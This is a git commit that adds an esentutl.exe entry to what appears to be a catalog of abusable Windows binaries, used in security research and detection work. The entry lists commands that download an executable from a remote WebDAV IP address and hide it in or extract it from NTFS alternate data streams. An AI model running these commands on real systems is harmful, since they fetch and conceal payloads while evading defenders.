added esentutl.exe
parent
735c36fd9a
commit
5e86fa16cf
|
@ -13,6 +13,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Cscript.exe](OSBinaries/Cscript.md)
|
||||
[Dfsvc.exe](OSBinaries/Dfsvc.md)
|
||||
[Diskshadow.exe](OSBinaries/Diskshadow.md)
|
||||
[Esentutl.exe](OSBinaries/Esentutl.md)
|
||||
[Extrac32.exe](OSBinaries/Extrac32.md)
|
||||
[Expand.exe](OSBinaries/Expand.md)
|
||||
[Explorer.exe](OSBinaries/Explorer.md)
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
## Esentutl.exe
|
||||
|
||||
* Functions: Copy, Download, Write ADS, Read ADS
|
||||
|
||||
```
|
||||
esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||||
|
||||
esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
|
||||
esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
|
||||
|
||||
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
|
||||
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
|
||||
|
||||
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* egre55 - @egre55
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/egre55/status/985994639202283520
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\esentutl.exe
|
||||
c:\windows\sysWOW64\esentutl.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue